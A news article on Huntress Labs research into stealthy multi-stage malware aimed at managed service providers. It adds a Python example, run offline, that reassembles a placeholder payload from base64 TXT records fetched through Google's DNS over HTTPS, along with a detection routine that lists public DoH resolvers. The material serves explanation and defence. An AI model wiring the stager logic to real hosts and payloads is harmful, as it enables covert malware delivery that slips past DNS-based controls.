Hackers are spreading complex malware to managed service providers (MSPs), using multiple sophisticated stealth techniques to avoid detection, Huntress Labs said in an updated blog post.
MSPs are particularly attractive targets because they typically serve many clients, so a single piece of malware that lands on an MSP can reach many potential victims at once. Huntress, which provides managed detection and response (MDR) services through MSPs, first described the malware's techniques in a blog post last June. Subsequent posts have focused on how the malware conceals its activity.
At first glance the malware looked like an application's log file, which is how it hid its activity, but on closer inspection the file "relates to a malicious base we discovered," Huntress co-founder John Ferrell said in the original post. "Malware writers used different tricks to hide, including renaming legitimate files, disguising themselves as existing scheduled tasks and using a malicious payload stored in a file that has been created to look like an error log."
A closer look
The malware, as John Hammond, a senior Huntress security researcher, wrote in the updated blog post, is a "multi-stager, multi-payload." Malware delivered in successive stages is not uncommon, but the lengths this sample goes to in order to evade detection are unusual. It is also stealthy enough to slip past a standard antivirus or endpoint product, he said.
An initial payload is delivered using legitimate Windows binaries to extract and execute a new PowerShell script. That script contains another piece of concealed, encrypted data which it uses to retrieve a second payload through Google's DNS over HTTPS service, a channel that, because it is ordinary HTTPS traffic to a well-known resolver, is not inspected by most DNS-based controls. "Using DNS over HTTP as a means of receiving another malware payload is a very clever trick," said Hammond. To deliver the final payload, the malware code reaches out to an external server, which installs the final command-and-control component and gives the attacker control of the target system.
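To make the DNS-over-HTTPS staging technique concrete, here is an added example that is not code from Huntress or from the malware itself. It shows how a stager can reassemble a second-stage payload from base64 chunks spread across TXT records returned by Google's DoH JSON API, and, on the defensive side, how proxy or EDR records of outbound HTTPS requests can be checked for bursts of TXT lookups to one zone through a public DoH resolver. The zone name, the DoH responses, the payload bytes and the request log are all constructed here so the script runs offline; the detection threshold is an assumed value, not one from the blog post.

```python
"""
Illustration of payload retrieval over DNS-over-HTTPS (DoH) and a
matching detection check.  Added example, not code from Huntress or the
malware.  The record names, the JSON documents and the payload are all
constructed here so the script runs offline; no network access is made.
"""
import base64
import hashlib
import json
import re
from typing import Callable, Dict, List

# Google's DoH JSON endpoint answers queries such as
#   https://dns.google/resolve?name=<label>&type=TXT
# with a JSON document.  TXT answers come back as quoted strings in the
# "data" field.  Below is a constructed response set: a hypothetical
# stager pulls the second-stage bytes as base64 chunks spread across
# TXT records c0..cN under an attacker-controlled zone (assumed name).
ZONE = "updates.example.invalid"   # assumed, not a real attacker domain


def _build_fake_doh_responses(payload: bytes, chunk_size: int = 32) -> Dict[str, str]:
    """Split payload into base64 chunks and wrap each as a DoH JSON answer."""
    b64 = base64.b64encode(payload).decode()
    chunks = [b64[i:i + chunk_size] for i in range(0, len(b64), chunk_size)]
    responses: Dict[str, str] = {}
    for idx, chunk in enumerate(chunks):
        name = f"c{idx}.{ZONE}."
        responses[name] = json.dumps({
            "Status": 0, "TC": False,
            "Question": [{"name": name, "type": 16}],
            "Answer": [{"name": name, "type": 16, "TTL": 60,
                        "data": f"\"{chunk}\""}],
        })
    # A count record tells the stager how many chunks to fetch.
    cnt = f"count.{ZONE}."
    responses[cnt] = json.dumps({"Status": 0, "Answer": [
        {"name": cnt, "type": 16, "TTL": 60, "data": f"\"{len(chunks)}\""}]})
    return responses


SECOND_STAGE = b"Write-Host 'second stage placeholder'"  # constructed payload
DOH_RESPONSES = _build_fake_doh_responses(SECOND_STAGE)


def _txt_data(doh_json: str) -> str:
    """Extract and unquote TXT record data from a Google-style DoH answer."""
    doc = json.loads(doh_json)
    if doc.get("Status") != 0:
        raise RuntimeError("DoH query failed")
    parts = [a["data"] for a in doc.get("Answer", []) if a.get("type") == 16]
    # Long TXT records arrive as several quoted strings: "\"aa\" \"bb\"".
    return "".join(re.findall(r'"([^"]*)"', " ".join(parts)))


def fetch_via_doh(resolve: Callable[[str], str]) -> bytes:
    """Reassemble the staged payload; `resolve(name)` returns DoH JSON text."""
    n = int(_txt_data(resolve(f"count.{ZONE}.")))
    b64 = "".join(_txt_data(resolve(f"c{i}.{ZONE}.")) for i in range(n))
    return base64.b64decode(b64)


def offline_resolver(name: str) -> str:
    """Stand-in for an HTTPS GET to dns.google; serves the constructed answers."""
    return DOH_RESPONSES[name]


# Detection side: given proxy/EDR records of outbound HTTPS requests,
# flag zones that receive repeated TXT lookups through a public DoH
# resolver.  The threshold is an assumed value, not from the blog post.
DOH_HOSTS = {"dns.google", "cloudflare-dns.com", "dns.quad9.net"}


def flag_doh_txt_bursts(requests: List[Dict[str, str]], threshold: int = 3) -> List[str]:
    """Return zones queried for TXT records via DoH at least `threshold` times."""
    counts: Dict[str, int] = {}
    for r in requests:
        if r["host"] not in DOH_HOSTS:
            continue
        m = re.search(r"[?&]name=([^&]+)", r["url"])
        t = re.search(r"[?&]type=(TXT|16)\b", r["url"], re.I)
        if not (m and t):
            continue
        # Collapse chunk labels (c0, c1, ...) to their parent zone.
        zone = ".".join(m.group(1).rstrip(".").split(".")[-3:])
        counts[zone] = counts.get(zone, 0) + 1
    return sorted(z for z, c in counts.items() if c >= threshold)


# Constructed request log: the DoH fetch above plus benign traffic.
SAMPLE_REQUESTS = [
    {"host": "dns.google", "url": f"/resolve?name=count.{ZONE}&type=TXT"},
    {"host": "dns.google", "url": f"/resolve?name=c0.{ZONE}&type=TXT"},
    {"host": "dns.google", "url": f"/resolve?name=c1.{ZONE}&type=TXT"},
    {"host": "dns.google", "url": "/resolve?name=example.com&type=A"},
    {"host": "www.example.com", "url": "/"},
]

if __name__ == "__main__":
    stage2 = fetch_via_doh(offline_resolver)
    print("reassembled:", stage2.decode())
    print("sha256:", hashlib.sha256(stage2).hexdigest())
    print("flagged zones:", flag_doh_txt_bursts(SAMPLE_REQUESTS))
```

Run stand-alone, the script reassembles the constructed payload from two chunk records and flags the assumed zone. The detection logic deliberately keys on the resolver host plus the query string rather than on any payload content, because the chunks are encoded and the transport is TLS; in a real deployment the host set and threshold would be tuned to the environment's own DoH baseline.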